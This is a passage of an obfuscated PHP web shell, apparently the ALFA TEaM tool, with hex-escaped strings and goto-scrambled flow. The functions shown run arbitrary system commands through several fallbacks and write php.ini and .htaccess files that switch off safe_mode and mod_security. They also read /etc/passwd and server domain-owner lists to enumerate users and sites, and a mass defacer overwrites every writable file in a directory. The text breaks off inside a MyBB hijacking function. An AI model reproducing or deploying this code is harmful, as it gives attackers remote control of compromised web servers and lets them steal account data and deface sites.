$v["\x6b\x65\x79\137\143\157\154\157\162"] : $v); } $array[$k] = $v; } $file = "\x61\154\146\141\x5f\143\x6f\154\x6f\162\x5f\x63\157\156\146\x69\147\x5f" . date("\x59\55\x6d\55\x64\55\150\x5f\151\x5f\163") . "\x2e\143\157\x6e\146"; $config = json_encode($array, JSON_PRETTY_PRINT); if (!@file_put_contents($file, $config)) { echo "\x3c\x70\x3e\74\x63\x65\x6e\x74\x65\162\76\103\x6f\x6c\157\162\x20\x43\x6f\156\146\151\x67\72\74\142\162\76\74\142\x72\x3e\x3c\x74\x65\x78\164\141\x72\x65\141\x20\x72\x6f\x77\163\75\42\61\62\x22\x20\143\157\154\x73\75\x22\x37\60\x22\40\x74\x79\x70\145\x3d\42\x74\x65\x78\164\x22\x3e" . $config . "\x3c\x2f\x74\145\170\x74\141\162\145\141\x3e\x3c\x2f\143\145\156\164\x65\162\76\74\57\x70\76"; } else { echo "\x3c\x68\63\x3e\74\x70\76\x3c\143\145\x6e\164\x65\162\76\x3c\141\x20\143\x6c\141\x73\x73\x3d\42\141\x63\x74\x69\x6f\156\x73\42\40\150\162\x65\146\75\x22\x6a\141\x76\141\x73\143\x72\x69\x70\164\x3a\166\x6f\x69\144\x28\x30\x29\73\x22\x20\157\x6e\x63\x6c\x69\x63\153\x3d\42\x67\x28\x27\106\151\x6c\x65\x73\x54\157\x6f\154\x73\x27\x2c\156\165\154\154\x2c\x27" . $file . "\x27\x2c\x20\47\x64\157\x77\x6e\154\157\x61\x64\47\x29\x22\x3e\74\146\x6f\156\x74\40\x63\157\154\157\162\x3d\x22\x23\60\106\x30\x22\76\x44\x6f\167\156\x6c\x6f\x61\x64\40\x43\157\x6e\146\x69\x67\x3c\57\146\157\x6e\x74\76\74\57\x61\x3e\x3c\57\143\x65\x6e\164\145\162\76\x3c\x2f\160\76\74\x2f\x68\63\76"; } } if ($_POST["\x61\x6c\x66\x61\62"] == "\76\76") { echo __pre(); $colors = json_decode($_POST["\141\154\x66\x61\61"], true); $array = ''; $is_default = isset($_POST["\x61\x6c\x66\x61\63"]) && $_POST["\141\x6c\x66\141\x33"] == "\x31" ? true : false; $glob_colors = $GLOBALS["\x5f\x5f\101\114\106\101\137\103\117\x4c\x4f\122\x5f\x5f"]; foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["\x6b\145\171\x5f\143\x6f\x6c\x6f\162"] : $v); } $array .= "\x22" . trim($k) . "\42\40\75\x3e\x20\x22" . $v . "\x22\54"; } @chdir($GLOBALS["\x68\157\x6d\x65\x5f\143\x77\x64"]); $basename = @basename($_SERVER["\x50\x48\x50\137\123\x45\x4c\x46"]); $data = @file_get_contents($basename); $color = "\57\47\x63\157\x6c\157\x72\47\x28\x2e\52\77\x29\x5c\51\x2c\57\163"; if (preg_match($color, $data, $e)) { $new = "\47\x63\x6f\x6c\157\x72\47\x20\x3d\x3e\x20\x61\x72\x72\x61\171\x28" . $array . "\x29\x2c"; $data = str_replace($e[0], $new, $data); if (@file_put_contents($basename, $data)) { echo "\x3c\x63\145\x6e\x74\x65\162\76\x3c\x70\x3e\x3c\150\x33\x3e\133\x2b\135\x20\x53\165\x63\143\x65\163\x73\56\x2e\56\74\57\150\x33\76\74\57\160\76\x3c\57\x63\x65\156\x74\145\162\76\74\x73\x63\162\x69\x70\x74\x3e\x6c\x6f\x63\x61\x74\x69\157\156\x2e\162\145\x6c\x6f\x61\x64\50\51\x3b\x3c\x2f\163\x63\x72\151\x70\164\76"; } else { echo "\x3c\143\x65\156\164\145\x72\x3e\74\x70\x3e\x3c\x68\63\x3e\133\x2d\135\x20\127\145\40\x4e\x6f\164\40\150\x61\166\x65\40\160\145\x72\155\x69\163\163\x69\x6f\156\x20\x74\x6f\40\105\x64\x69\164\x20\163\150\145\154\154\56\56\56\41\74\57\x68\x33\76\74\x2f\160\76\74\x2f\143\145\x6e\164\x65\x72\76"; } } else { echo "\74\143\x65\x6e\x74\145\162\x3e\74\x70\76\x3c\150\x33\76\133\x2d\x5d\40\x45\162\x72\157\x72\56\x2e\56\x21\74\x2f\x68\x33\76\x3c\x2f\160\76\74\x2f\x63\145\156\164\145\x72\x3e"; } } } echo "\74\57\x64\x69\x76\x3e"; alfafooter(); } goto YNiqE; K5MFn: $GLOBALS["\104\x42\137\116\101\x4d\x45"] = $GLOBALS["\x6f\132\147\116\x79\x70\157\x50\122\x55"]; goto r05Ia; i8Olb: $xd .= "\x53\x69\164\145\x20\72\40" . $_SERVER["\110\x54\124\120\x5f\x48\117\x53\124"] . "\15\12"; goto FRkec; IGhSm: function _alfa_is_writable($file) { $check = false; $check = @is_writable($file); if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("\x5b\40\55\x77\x20\42" . trim(addslashes($file)) . "\x22\40\x5d\x20\46\46\x20\x65\x63\150\x6f\40\42\x79\145\x73\42\x20\174\x7c\x20\x65\143\150\157\40\x22\156\x6f\x22"); if ($check == "\171\x65\x73") { $check = true; } else { $check = false; } } } return $check; } goto HZNvy; ar_2Q: function alfasafe() { alfahead(); echo "\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\x68\145\141\144\x65\x72\x3e\74\x63\x65\x6e\164\x65\162\76\x3c\142\162\x3e\74\x64\151\166\40\143\x6c\x61\x73\x73\x3d\x27\164\x78\164\x66\157\156\164\x5f\150\145\141\144\x65\x72\47\76\174\x20\x41\x75\x74\157\x20\x42\171\x50\x61\x73\x73\x65\x72\40\x7c\x3c\x2f\x64\x69\166\x3e"; echo "\x3c\x68\x33\76\74\141\40\150\162\x65\146\75\152\141\166\x61\x73\x63\162\151\160\x74\x3a\166\x6f\151\144\50\x30\51\40\x6f\156\x63\154\151\143\153\75\42\147\x28\x27\x73\x61\x66\145\47\54\156\165\x6c\x6c\54\47\160\x68\160\56\151\x6e\x69\47\x2c\156\x75\x6c\x6c\x29\x22\x3e\x7c\40\x50\x48\x50\56\111\116\111\x20\174\x20\74\x2f\x61\x3e\74\141\40\150\162\x65\x66\x3d\x6a\x61\x76\x61\x73\143\162\151\x70\164\72\166\x6f\x69\x64\x28\x30\x29\x20\157\x6e\x63\x6c\151\x63\x6b\75\x22\x67\x28\x27\x73\x61\x66\x65\47\x2c\x6e\x75\154\154\x2c\x6e\165\154\x6c\54\x27\151\x6e\x69\x27\x29\x22\76\174\40\x2e\x68\x74\x61\x63\x63\145\x73\163\x28\x61\x70\141\x63\x68\145\x29\40\174\x20\74\x2f\141\x3e\x3c\x61\x20\150\x72\x65\146\x3d\x6a\141\x76\x61\163\143\x72\x69\160\164\72\166\x6f\x69\144\50\x30\x29\x20\x6f\156\143\154\x69\x63\x6b\x3d\42\x67\50\47\163\x61\146\x65\x27\x2c\x6e\x75\x6c\154\54\156\x75\154\x6c\54\x6e\165\x6c\x6c\54\47\160\154\47\51\42\76\174\x20\x2e\x68\164\x61\x63\x63\145\163\163\x28\x4c\x69\x74\145\x53\160\145\145\x64\51\40\x7c\x3c\x2f\141\76\x3c\x61\40\150\162\x65\x66\x3d\152\x61\166\141\163\x63\x72\x69\160\164\72\166\x6f\x69\144\x28\x30\x29\x20\157\156\143\154\151\x63\153\75\42\x67\x28\x27\163\x61\x66\x65\47\54\x6e\165\x6c\x6c\54\156\x75\154\154\54\156\165\154\154\54\156\165\x6c\154\54\47\x70\141\x73\163\167\x64\47\51\42\x3e\x7c\40\122\145\x61\x64\x2d\x50\x61\163\x73\167\144\x20\x7c\40\x3c\57\x61\x3e\x3c\141\40\x68\162\x65\x66\x3d\152\141\166\x61\x73\x63\162\151\160\x74\x3a\x76\157\x69\144\x28\x30\x29\x20\x6f\156\143\x6c\x69\x63\153\x3d\42\x67\x28\x27\163\x61\146\x65\47\x2c\x6e\x75\x6c\x6c\x2c\x6e\x75\x6c\x6c\x2c\156\x75\x6c\x6c\x2c\x6e\165\x6c\154\54\156\x75\154\x6c\x2c\x27\165\163\145\x72\x73\47\51\42\76\174\40\x52\x65\141\144\55\x55\163\x65\162\x73\x20\174\x20\74\x2f\141\x3e\x3c\141\x20\150\162\x65\146\x3d\x6a\141\x76\x61\163\x63\162\151\x70\x74\x3a\x76\157\x69\144\50\60\51\40\157\156\x63\x6c\151\x63\x6b\75\42\x67\50\47\163\141\x66\x65\47\54\x6e\x75\x6c\x6c\54\x6e\x75\154\154\54\156\x75\x6c\154\x2c\156\165\154\154\x2c\x6e\165\154\x6c\x2c\x6e\165\x6c\154\54\47\166\141\x6c\x69\141\163\x65\163\47\51\42\x3e\x7c\x20\x47\145\x74\55\x55\x73\145\162\x20\x7c\40\x3c\x2f\x61\76\x3c\x61\x20\150\162\x65\x66\75\152\x61\x76\x61\163\143\x72\151\160\164\x3a\x76\157\151\x64\x28\60\x29\x20\157\x6e\143\154\151\143\153\x3d\x22\x67\x28\x27\163\x61\x66\145\x27\x2c\x6e\165\154\154\x2c\156\x75\x6c\x6c\x2c\156\x75\154\x6c\x2c\156\x75\x6c\154\x2c\x6e\165\x6c\154\54\156\x75\154\x6c\x2c\156\165\x6c\x6c\54\x6e\x75\x6c\x6c\54\x27\144\157\x6d\141\x69\156\x73\x27\51\x22\x3e\x7c\40\107\x65\x74\55\104\x6f\x6d\141\151\156\163\40\x7c\x20\x3c\x2f\x61\76\x3c\x2f\x63\145\x6e\164\145\x72\76\x3c\x2f\x68\x33\x3e"; if (!empty($_POST["\x61\x6c\146\141\70"]) && isset($_POST["\x61\x6c\146\141\70"]) == "\144\157\x6d\141\x69\x6e\x73") { if (!_alfa_file_exists("\x2f\145\x74\x63\x2f\166\x69\x72\164\165\x61\154\x2f\144\157\x6d\141\x69\x6e\x6f\167\x6e\x65\162\163")) { echo __pre(); $solevisible9 = _alfa_file("\x2f\145\164\143\x2f\156\x61\155\x65\x64\x2e\143\x6f\156\x66"); if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("\172\157\x6e\145", $solevisible13)) { preg_match_all("\43\x7a\x6f\156\145\40\x22\x28\56\52\x29\x22\x23", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "\x3c\142\x72\x3e"; } } } } } else { echo __pre(); $users = _alfa_file("\x2f\x65\164\x63\57\x76\151\x72\164\165\x61\x6c\57\x64\157\x6d\x61\x69\156\157\x77\x6e\145\162\x73"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode("\x3a", $boz); echo $dom[0] . "\12"; } } } } if (!empty($_POST["\141\154\x66\141\66"]) && isset($_POST["\141\154\146\141\x36"]) == "\166\x61\x6c\151\x61\163\x65\x73") { echo "\12\x3c\x66\157\x72\x6d\40\x6f\156\x73\165\x62\x6d\x69\x74\x3d\x22\147\x28\x27\163\x61\x66\x65\47\x2c\156\x75\x6c\x6c\x2c\x6e\165\x6c\154\x2c\x6e\x75\x6c\x6c\54\156\165\x6c\154\x2c\x6e\165\154\154\54\156\165\x6c\154\54\47\166\141\154\151\141\x73\145\x73\x27\54\x74\150\x69\163\x2e\163\151\164\x65\56\166\141\154\165\145\x2c\156\165\154\154\x2c\x27\x3e\x3e\47\x29\x3b\40\x72\x65\x74\165\162\156\40\x66\141\x6c\x73\x65\x3b\42\x20\155\x65\x74\x68\157\144\x3d\x22\160\x6f\x73\x74\42\40\x2f\76\x3c\143\145\x6e\x74\x65\162\76\74\144\x69\166\x20\143\154\x61\163\x73\x3d\x22\x74\170\x74\146\157\x6e\x74\x22\76\125\x72\154\72\40\74\x2f\x66\157\156\x74\76\x3c\x69\156\x70\x75\x74\x20\164\171\160\145\x3d\x22\x74\145\170\164\42\x20\160\154\141\x63\x65\150\157\154\144\145\x72\75\42\163\151\x74\145\x2e\143\x6f\155\42\40\x6e\x61\x6d\145\x3d\42\x73\151\x74\x65\x22\x20\57\76\x20\x3c\151\x6e\160\x75\x74\x20\x74\171\160\145\x3d\42\163\165\142\155\151\164\x22\40\x76\x61\154\x75\x65\x3d\42\40\42\40\x6e\141\155\x65\x3d\x22\x67\x6f\x22\x20\x2f\x3e\x3c\57\x66\157\x72\155\76\74\x2f\143\x65\156\x74\145\162\76"; if (isset($_POST["\x61\154\x66\141\x39"]) && $_POST["\x61\x6c\x66\141\x39"] == "\x3e\x3e") { if (!_alfa_file_exists("\x2f\145\164\143\x2f\x76\151\162\164\165\x61\x6c\57\x64\157\x6d\x61\151\x6e\x6f\167\156\x65\x72\163")) { $site = trim($_POST["\x61\x6c\146\x61\67"]); $rep = str_replace(array("\x68\x74\x74\x70\x73\x3a\x2f\x2f", "\x68\164\x74\160\72\57\x2f", "\x77\167\167\x2e"), '', $site); $user = ''; if (function_exists("\x70\157\163\151\170\137\x67\x65\x74\160\167\165\x69\144") && function_exists("\146\151\x6c\145\x6f\x77\x6e\145\162")) { if ($user = @posix_getpwuid(@fileowner("\x2f\x65\x74\x63\57\166\141\154\x69\141\163\145\163\x2f{$rep}"))) { $user = $user["\x6e\141\x6d\x65"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("\163\x74\141\x74\40\55\143\x20\47\45\125\47\40\57\x65\x74\143\57\166\141\x6c\x69\141\163\145\x73\x2f" . $rep); } } if (!empty($user) && $user != "\x72\157\157\x74") { echo __pre() . "\x3c\x63\x65\156\164\x65\162\x3e\74\x74\x61\142\x6c\x65\40\142\157\162\144\145\162\x3d\x27\61\x27\x3e\74\x74\162\76\74\164\x64\76\x3c\142\x3e\74\x66\x6f\156\x74\40\143\157\154\x6f\162\75\42\x23\106\x46\106\x46\x46\106\42\76\x55\x73\x65\162\x3a\x20\x3c\57\142\x3e\x3c\x2f\146\157\x6e\164\76\74\x2f\164\x64\x3e\x3c\x74\x64\x3e\74\x62\76\x3c\x66\157\156\x74\x20\143\157\x6c\x6f\162\x3d\x22\x23\106\x46\60\60\x30\x30\42\76{$user}\74\57\146\x6f\x6e\164\76\74\x2f\x62\76\x3c\57\x74\144\76\x3c\x2f\x74\162\76\x3c\164\x72\76\x3c\x74\144\76\74\142\x3e\x3c\x66\x6f\x6e\x74\40\x63\157\154\157\162\75\42\x23\106\x46\x46\106\x46\106\x22\x3e\x73\151\x74\x65\72\40\x3c\57\142\76\74\x2f\146\x6f\156\x74\x3e\x3c\x2f\164\x64\76\x3c\x74\x64\x3e\74\142\76\x3c\x66\x6f\x6e\164\x20\143\x6f\x6c\157\162\x3d\42\43\106\106\60\60\60\60\x22\76{$rep}\74\57\146\x6f\156\x74\x3e\74\x2f\142\76\74\57\x74\x64\x3e\x3c\x2f\x74\x72\x3e\x3c\x2f\164\x61\x62\154\x65\x3e\74\57\143\145\156\164\x65\162\x3e"; } else { echo __pre() . "\x3c\x63\x65\156\164\145\x72\76\74\142\x3e\116\157\40\x73\165\143\x68\x20\146\151\x6c\145\40\157\x72\x20\x64\x69\x72\x65\143\164\x6f\x72\171\x20\x4f\x72\40\x44\x69\163\141\x62\x6c\145\x20\106\165\x6e\x63\x74\151\157\x6e\163\40\151\163\x20\x6e\157\x74\x20\116\117\116\105\x2e\x2e\x2e\74\57\x62\76\74\57\x63\x65\x6e\x74\145\x72\x3e"; } } else { $site = trim($_POST["\x61\x6c\146\x61\x37"]); $rep = str_replace(array("\x68\x74\164\160\163\x3a\x2f\x2f", "\x68\164\164\160\72\x2f\57", "\x77\x77\x77\x2e"), '', $site); $users = _alfa_file("\x2f\x65\164\x63\x2f\166\151\x72\164\165\141\x6c\57\144\157\155\x61\151\156\x6f\167\x6e\145\x72\x73"); foreach ($users as $boz) { $ex = explode("\x3a", $boz); if ($ex[0] == $rep) { echo __pre() . "\x3c\143\x65\156\164\145\162\x3e\x3c\164\141\x62\x6c\145\40\142\157\162\x64\x65\x72\x3d\47\x31\x27\x3e\xa\74\x74\x72\76\74\x74\x64\x3e\x3c\142\x3e\74\146\157\156\x74\40\143\x6f\x6c\x6f\162\x3d\42\x23\106\x46\106\106\x46\x46\42\76\x55\x73\x65\162\x3a\x20\x3c\x2f\x62\76\74\x2f\x66\157\156\164\x3e\74\x2f\164\x64\76\74\x74\144\x3e\x3c\x62\76\74\x66\x6f\156\x74\x20\143\157\x6c\157\x72\x3d\x22\x23\x46\106\x30\x30\x30\x30\42\x3e" . trim($ex[1]) . "\74\x2f\146\157\x6e\x74\x3e\x3c\57\x62\x3e\x3c\57\x74\x64\x3e\x3c\57\164\x72\x3e\12\74\164\x72\76\x3c\164\144\x3e\x3c\x62\x3e\74\146\157\156\164\x20\x63\157\x6c\x6f\x72\75\x22\43\x46\x46\106\106\x46\x46\x22\76\163\x69\164\145\x3a\40\x3c\x2f\142\x3e\74\57\x66\157\156\164\76\74\57\x74\144\x3e\74\x74\144\x3e\74\x62\76\74\x66\157\x6e\164\40\x63\x6f\x6c\x6f\162\75\42\x23\x46\x46\x30\60\60\x30\42\x3e{$rep}\74\57\146\157\156\x74\x3e\74\57\x62\x3e\74\x2f\x74\144\76\74\57\x74\x72\76\74\x2f\164\141\142\x6c\145\x3e\74\57\x63\145\x6e\x74\145\x72\x3e"; break; } } } } } if (!empty($_POST["\x61\x6c\x66\x61\x35"]) && isset($_POST["\141\x6c\146\x61\65"])) { if (!_alfa_file_exists("\x2f\145\x74\x63\x2f\x76\x69\x72\164\x75\x61\x6c\x2f\144\157\155\141\x69\156\x6f\x77\156\x65\162\163")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\xa"; break; } } $i++; } } else { echo __pre(); $users = _alfa_file("\x2f\x65\164\x63\x2f\166\x69\162\164\165\x61\154\x2f\144\x6f\155\x61\151\x6e\x6f\167\156\x65\162\163"); foreach ($users as $boz) { $user = explode("\72", $boz); echo trim($user[1]) . "\x3c\x62\162\76"; } } } if (!empty($_POST["\x61\154\x66\141\x34"]) && isset($_POST["\141\154\146\141\x34"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("\x2f\x65\164\143\57\x70\141\x73\163\x77\x64"); } elseif (function_exists("\x70\x6f\x73\x69\x78\x5f\147\x65\164\160\x77\165\x69\144")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}\x3a"; } echo "\xa"; } } } else { __alert("\146\141\x69\x6c\145\x64\x2e\x2e\56"); } } if (!empty($_POST["\x61\154\x66\x61\62"]) && isset($_POST["\141\x6c\x66\141\x32"])) { @__write_file($GLOBALS["\x63\x77\144"] . "\x2e\x68\x74\141\x63\143\x65\x73\163", "\x23\x47\x65\156\145\x72\x61\164\x65\144\x20\x42\171\40\123\157\x6c\x65\40\123\141\x64\40\x61\156\144\x20\x49\x6e\166\151\x73\151\142\x6c\x65\12\74\111\x66\x4d\x6f\x64\165\154\x65\x20\155\157\x64\137\163\x65\x63\165\x72\151\164\171\56\143\76\12\x53\x65\x63\55\x2d\55\55\55\x2d\105\156\x67\x69\x6e\x65\40\117\x66\x66\12\x53\x65\143\55\55\x2d\55\55\x2d\x53\143\x61\x6e\120\117\x53\x54\40\x4f\x66\x66\xa\74\x2f\111\146\x4d\157\x64\x75\154\145\x3e"); echo "\74\x63\145\156\164\x65\162\x3e\x3c\142\x3e\x3c\x62\151\x67\76\x68\x74\x61\143\x63\x65\x73\x73\x20\146\157\x72\40\101\160\x61\143\x68\145\x20\143\162\x65\141\x74\145\144\56\x2e\56\x21\74\x2f\143\145\x6e\164\145\x72\76\74\57\x62\x3e\x3c\x2f\x62\151\x67\76"; } if (!empty($_POST["\x61\x6c\x66\x61\61"]) && isset($_POST["\141\154\x66\141\61"])) { @__write_file($GLOBALS["\x63\167\x64"] . "\x70\x68\x70\x2e\151\156\151", "\x73\141\x66\145\x5f\155\x6f\x64\145\75\117\x46\x46\xa\144\151\163\141\x62\154\x65\x5f\x66\165\156\x63\x74\151\157\x6e\163\75\x42\171\x50\x61\x73\163\145\x64\x20\102\x79\x20\123\x6f\x6c\145\x20\x53\141\x64\x20\x26\40\111\x6e\x76\151\x73\151\142\154\x65\x28\101\114\x46\x41\x20\124\x45\x61\x4d\51"); echo "\x3c\x63\x65\156\x74\145\x72\76\x3c\142\76\x3c\x62\x69\x67\76\40\x70\150\160\x2e\151\156\x69\40\143\162\145\141\164\x65\x64\x2e\56\56\x21\x3c\57\143\145\156\x74\x65\162\x3e\74\x2f\142\x3e\x3c\x2f\x62\151\147\76"; } if (!empty($_POST["\x61\154\x66\141\63"]) && isset($_POST["\141\154\x66\141\63"])) { @__write_file($GLOBALS["\x63\167\x64"] . "\56\150\x74\x61\x63\x63\145\163\163", "\43\107\x65\x6e\x65\162\141\x74\145\144\x20\x42\x79\40\123\x6f\x6c\x65\x20\123\x61\x64\40\141\x6e\x64\x20\111\156\166\151\x73\151\142\x6c\x65\xa\74\106\x69\154\145\x73\x20\x2a\x2e\x70\x68\x70\x3e\12\x46\157\x72\143\145\124\x79\x70\x65\40\141\160\x70\x6c\151\x63\x61\164\151\157\156\57\x78\x2d\x68\x74\x74\160\144\55\x70\x68\x70\64\xa\x3c\x2f\106\151\154\x65\163\76\xa\74\x49\x66\115\x6f\x64\x75\x6c\x65\40\x6d\157\x64\x5f\x73\x65\x63\165\162\x69\164\x79\x2e\143\x3e\xa\123\x65\x63\106\151\x6c\x74\x65\x72\105\156\147\151\156\x65\40\x4f\x66\146\12\x53\x65\143\x46\151\154\164\x65\x72\x53\143\x61\156\120\117\x53\124\40\x4f\x66\x66\12\74\x2f\111\x66\x4d\x6f\x64\x75\x6c\x65\x3e"); echo "\x3c\143\x65\x6e\164\x65\x72\x3e\x3c\142\x3e\x3c\142\x69\147\76\x68\164\141\143\143\x65\163\163\x20\146\x6f\x72\40\x4c\x69\164\145\163\160\145\x65\144\x20\x63\162\145\x61\x74\x65\x64\x2e\56\56\x21\x3c\x2f\x63\x65\x6e\x74\x65\x72\76\x3c\x2f\142\x3e\x3c\x2f\142\151\x67\76"; } echo "\74\x62\162\x3e\x3c\57\x64\151\x76\x3e"; alfafooter(); } goto EoAWA; K8RV4: function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "\x3c\144\x69\x76\x20\143\154\141\163\163\x3d\x68\x65\141\144\145\162\76\74\x63\x65\x6e\164\145\x72\76\74\160\76\x3c\x64\151\166\x20\x63\x6c\141\163\163\75\47\164\x78\x74\x66\157\156\x74\137\150\145\x61\x64\x65\x72\x27\x3e\174\40\115\x61\x73\163\40\x44\145\146\141\143\x65\x72\40\x7c\74\57\x64\151\x76\76\74\57\160\x3e\74\x66\x6f\x72\155\x20\157\x6e\x53\165\142\x6d\x69\164\x3d\42\x67\x28\47\x4d\x61\x73\163\x44\145\x66\141\x63\x65\162\x27\x2c\x6e\165\154\x6c\x2c\164\150\151\163\56\155\141\163\x73\x64\x69\x72\x2e\x76\x61\x6c\x75\x65\54\164\x68\151\x73\56\144\x65\x66\x70\141\147\145\x2e\166\141\x6c\x75\145\54\164\150\151\x73\x2e\x6d\x65\x74\150\157\144\56\166\141\x6c\x75\145\x2c\x27\x3e\76\x27\x29\x3b\x72\145\x74\165\162\156\40\146\141\x6c\x73\145\x3b\x22\40\x6d\145\164\x68\157\x64\x3d\x27\160\x6f\x73\164\x27\x3e"; echo "\74\144\x69\x76\x20\x63\154\x61\163\163\x3d\42\164\x78\x74\146\157\156\x74\x22\76\x44\x65\x66\141\x63\145\x20\115\145\x74\150\157\144\x3a\40\x3c\x73\145\x6c\145\143\x74\x20\156\141\x6d\x65\x3d\42\x6d\x65\164\x68\157\144\x22\x3e\74\157\160\164\151\157\x6e\40\x76\x61\154\x75\x65\75\42\x69\156\x64\x65\x78\42\76\x44\145\146\x61\143\145\x20\111\x6e\144\145\x78\x20\x44\151\x72\163\74\57\157\x70\164\x69\157\156\x3e\74\x6f\x70\x74\x69\157\156\x20\166\141\x6c\165\145\75\42\141\x6c\x6c\x22\76\x41\154\154\x20\x46\x69\154\145\x73\x3c\57\157\x70\x74\x69\157\156\76\74\57\163\145\x6c\x65\143\x74\x3e\xa\11\115\x61\x73\163\40\x64\x69\x72\x3a\x20\x3c\x69\x6e\x70\x75\164\x20\x73\x69\x7a\145\x3d\42\65\60\x22\40\x69\144\x3d\x22\x74\x61\x72\x67\145\164\42\40\x74\171\160\145\x3d\42\x74\145\x78\x74\42\x20\156\x61\155\145\75\x22\x6d\141\163\163\x64\x69\162\x22\x20\166\141\x6c\x75\x65\x3d\x22" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\x22\x3e\12\x9\x44\145\146\x50\x61\147\x65\72\x20\74\x69\x6e\x70\165\x74\x20\163\151\172\145\75\x22\65\x30\42\40\x74\x79\x70\x65\x3d\x22\x74\145\x78\x74\x22\x20\156\x61\155\x65\x3d\x22\144\145\146\160\x61\147\x65\x22\x20\x76\141\154\165\145\x3d\42" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\42\x3e\x3c\57\144\x69\x76\76\x20\x3c\x69\156\x70\x75\x74\x20\164\171\160\145\x3d\42\x73\x75\x62\x6d\151\164\42\x20\156\x61\x6d\145\75\42\142\164\x6e\42\40\166\x61\154\x75\x65\x3d\x22\x20\42\x3e\74\57\143\x65\156\164\x65\162\76\x3c\x2f\x70\76\12\x3c\57\146\157\x72\x6d\76"; $dir = $_POST["\x61\x6c\146\141\x31"]; $defpage = $_POST["\x61\x6c\146\x61\x32"]; $method = $_POST["\x61\154\x66\x61\63"]; $fCurrent = $GLOBALS["\137\137\146\151\x6c\145\137\160\x61\x74\x68"]; if ($_POST["\x61\154\x66\141\x34"] == "\76\76") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == "\x2e\56" || $file == "\x2e") { continue; } $newfile = $dir . $file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert("\74\x66\157\156\x74\x20\x63\x6f\x6c\x6f\x72\x3d\x22\162\x65\144\x22\x3e\105\162\x72\x6f\162\x20\111\156\x20\117\x70\145\156\x44\x69\162\x2e\56\56\74\x2f\x66\157\156\164\x3e"); } } else { __alert("\74\x66\x6f\156\164\x20\x63\157\x6c\157\162\75\42\162\145\144\42\76\104\x65\146\x50\x61\147\x65\x20\x46\x69\154\145\x20\116\157\164\106\x6f\165\x6e\144\x2e\56\56\x3c\x2f\146\x6f\156\x74\x3e"); } } else { __alert("\74\146\x6f\156\164\40\x63\157\154\x6f\x72\75\42\x72\x65\x64\42\x3e\x44\x69\x72\x65\143\164\x6f\x72\x79\x20\x69\x73\40\156\157\x74\40\122\145\141\144\x61\x62\154\x65\56\56\x2e\74\57\x66\157\156\x74\76"); } } else { __alert("\x3c\x66\157\156\164\40\x63\x6f\x6c\x6f\162\75\x22\162\145\144\42\76\x4d\x61\163\x73\x20\104\151\162\40\151\x73\x20\x49\x6e\x76\141\x6c\151\x64\40\104\151\x72\56\56\x2e\74\x2f\146\x6f\156\x74\76"); } } else { __alert("\74\x66\157\156\x74\x20\143\x6f\x6c\157\x72\x3d\x22\162\145\x64\x22\x3e\x44\x69\162\40\x69\163\40\105\x6d\160\164\171\x2e\56\56\x3c\57\x66\157\156\164\x3e"); } } echo "\74\57\144\x69\166\76"; alfafooter(); } goto Xrfh9; L6Kl6: function _AlfaSecretKey() { $secret = @$_COOKIE["\x41\154\x66\141\x53\145\x63\162\x65\x74\x4b\x65\171"]; if (!isset($_COOKIE["\x41\154\146\141\x53\145\143\x72\x65\x74\113\145\171"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("\x41\154\x66\x61\123\145\143\x72\145\164\x4b\145\x79", $secret); } return $secret; } goto PuSe1; KtNd0: function _alfa_php_cmd($in, $re = false) { $out = ''; try { if ($re) { $in = $in . "\x20\62\76\x26\61"; } if (function_exists("\145\x78\x65\x63")) { @exec($in, $out); $out = @join("\12", $out); } elseif (function_exists("\160\x61\x73\163\x74\x68\x72\x75")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("\163\x79\163\x74\x65\x6d")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x68\x65\x6c\154\137\x65\x78\x65\x63")) { $out = shell_exec($in); } elseif (function_exists("\160\157\160\145\156") && function_exists("\160\143\154\x6f\163\x65")) { if (is_resource($f = @popen($in, "\162"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("\x70\162\157\x63\x5f\x6f\x70\145\x6e")) { $pipes = array(); $process = @proc_open($in . "\40\x32\x3e\x26\61", array(array("\x70\151\160\145", "\167"), array("\x70\x69\x70\x65", "\x77"), array("\160\151\160\x65", "\x77")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("\x43\117\x4d")) { $alfaWs = new COM("\x57\123\x63\162\x69\160\164\x2e\163\x68\x65\x6c\x6c"); $exec = $alfaWs->exec("\x63\x6d\144\x2e\145\x78\145\x20\x2f\143\40" . $_POST["\x61\154\146\x61\x31"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } goto GIU6h; qpgQy: function hijackMybb($path, $saveto) { $code = 